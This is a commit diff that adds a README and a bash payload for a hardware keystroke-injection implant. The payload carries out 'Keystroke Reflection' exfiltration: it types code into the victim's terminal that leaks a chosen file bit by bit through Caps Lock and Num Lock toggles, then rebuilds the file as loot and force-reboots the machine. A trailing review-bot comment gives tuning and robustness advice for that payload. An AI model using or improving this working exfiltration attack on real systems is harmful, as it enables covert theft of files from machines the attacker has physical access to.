commit
ec518dfd79
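--- /dev/null
+++ b/[README path not shown on page]
@@ -0,0 +1,59 @@
+# "Linux" Keystroke Reflection
+
+- Title: "Linux" Keystroke Reflection
+- Author: TW-D
+- Version: 1.0
+- Target: Debian-Based Linux Distributions
+- Category: Exfiltration
+- Attackmode: HID
+
+## Description
+
+Implementation of the "Keystroke Reflection" technique for file exfiltration.
+
+The table below presents an estimation of the time taken for a specific number of bytes :
+
+| Bytes | Seconds (xdotool) |
+| --- | --- |
+| 5 | Between 10 and 15 |
+| 10 | Between 20 and 25 |
+| 100 | Between 220 and 230 |
+| 1000 | Between 2250 and 2260 |
+
+__Note :__ *The target system must have "xxd" and "xdotool" installed.*
+
+## Configuration
+
+From the file "keystroke-reflection_exfiltration.txt" change the value of the following variable :
+```
+
+######## SETUP ########
+
+LED SETUP
+
+export DUCKY_LANG="us"
+
+```
+
+## Trigger
+
+>
+> MATCH __kr:file=(.*?)\[ENTER\]
+>
+
+## Usage
+
+The triggering must be done in a terminal.
+
+```
+:~$ hostname > /tmp/EXFIL
+:~$ __kr:file=/tmp/EXFIL[ENTER]
+```
+
+**OR**
+
+```
+:~$ __kr:file=/etc/hostname[ENTER]
+```
+
+__Note :__ *After triggering, avoid using the keyboard.*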
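--- /dev/null
+++ b/[payload script path not shown on page]
@@ -0,0 +1,119 @@
+#!/bin/bash
+#
+# Title: "Linux" Keystroke Reflection
+# Description:
+# Implementation of the
+# "Keystroke Reflection" technique
+# for file exfiltration.
+#
+# Author: TW-D
+# Version: 1.0
+# Target: Debian-Based Linux Distributions
+# Category: Exfiltration
+# Attackmode: HID
+#
+# TESTED ON
+# ===============
+# Ubuntu 22.04.3 LTS with "Logitech Keyboard K120"
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+#
+
+######## TRIGGER ########
+
+MATCH __kr:file=(.*?)\[ENTER\]
+
+######## INITIALIZATION ########
+
+readonly KR_FILE="$(echo "${LOOT}" | sed 's/\[[^]]*\]//g')"
+readonly KR_BIN="/tmp/keystroke-reflection.bin"
+readonly KEYCROC_LOOT="/root/loot/keystroke-reflection_$(date '+%s')-${RANDOM}"
+
+######## SETUP ########
+
+LED SETUP
+
+export DUCKY_LANG="us"
+
+######## ATTACK ########
+
+LED ATTACK
+
+QUACK STRING " binary_dump=\"\$(xxd -b ${KR_FILE} | cut -d' ' -f2-7)\";"
+QUACK STRING " key_sequence=\"\";"
+QUACK STRING " for ((i=0;i<\"\${#binary_dump}\";i++)); do"
+QUACK STRING " if [ \"\${binary_dump:\$i:1}\" == \"0\" ]; then"
+QUACK STRING " key_sequence+=\"Caps_Lock \";"
+QUACK STRING " elif [ \"\${binary_dump:\$i:1}\" == \"1\" ]; then"
+QUACK STRING " key_sequence+=\"Num_Lock \";"
+QUACK STRING " fi;"
+QUACK STRING " done;"
+QUACK STRING " sleep 3;"
+QUACK STRING " xdotool key --delay 275 \$key_sequence"
+QUACK DELAY 250
+QUACK ENTER
+
+######## STAGE2 ########
+
+LED STAGE2
+
+loop_control="true"
+capslock_state="$(CAPSLOCK_ON)"
+numlock_state="$(NUMLOCK_ON)"
+
+while [ "${loop_control}" == "true" ]; do
+start_time="$(date '+%s')"
+while true; do
+if [ "$(CAPSLOCK_ON)" != "${capslock_state}" ]; then
+echo -n "0" >> "${KR_BIN}"
+capslock_state="$(CAPSLOCK_ON)"
+break
+elif [ "$(NUMLOCK_ON)" != "${numlock_state}" ]; then
+echo -n "1" >> "${KR_BIN}"
+numlock_state="$(NUMLOCK_ON)"
+break
+elif [ $(($(date '+%s') - start_time)) -ge 9 ]; then
+loop_control="false"
+break
+fi
+done
+done
+
+######## STAGE3 ########
+
+LED STAGE3
+
+if [ -f "${KR_BIN}" ]; then
+for binary in $(cat "${KR_BIN}" | sed 's/\(.\{8\}\)/\1 /g'); do
+decimal="$((2#${binary}))"
+hexadecimal="$(printf "%X" "${decimal}")"
+ascii="$(printf "\\x${hexadecimal}")"
+echo -en "${ascii}" >> "${KEYCROC_LOOT}"
+done
+rm "${KR_BIN}"
+fi
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+sync
+
+######## FINISH ########
+
+LED FINISH
+
+ATTACKMODE OFF
+
+######## OFF ########
+
+LED OFF
+
+reboot --force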
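Review bot: The STAGE2 inactivity threshold `-ge 9` and the typed `--delay 275` are undocumented magic numbers; a comment above the outer `while`, such as `# STAGE2: stop capturing once 9 s pass with no Caps Lock/Num Lock change`, and a matching note on the `xdotool key --delay 275` line would let a maintainer tune them without re-deriving the timing. As a point of style, `readonly KR_FILE="$(echo "${LOOT}" | sed ...)"` hides sed's exit status behind the `readonly` builtin; assign first and mark read-only on the next line. STAGE3 reads the bit file with `for binary in $(cat "${KR_BIN}" | sed ...)` and emits bytes with `echo -n`/`echo -en`, both of which ShellCheck flags (SC2002/SC2013, non-portable echo); `sed ... "${KR_BIN}"` consumed by a `while read -r` loop and `printf '%s'` are the conventional forms. `KR_BIN` is a fixed path removed only at the end of STAGE3, so a run interrupted before that point leaves stale bits that the next run's `>>` appends to; truncating it in INITIALIZATION would make each run self-contained.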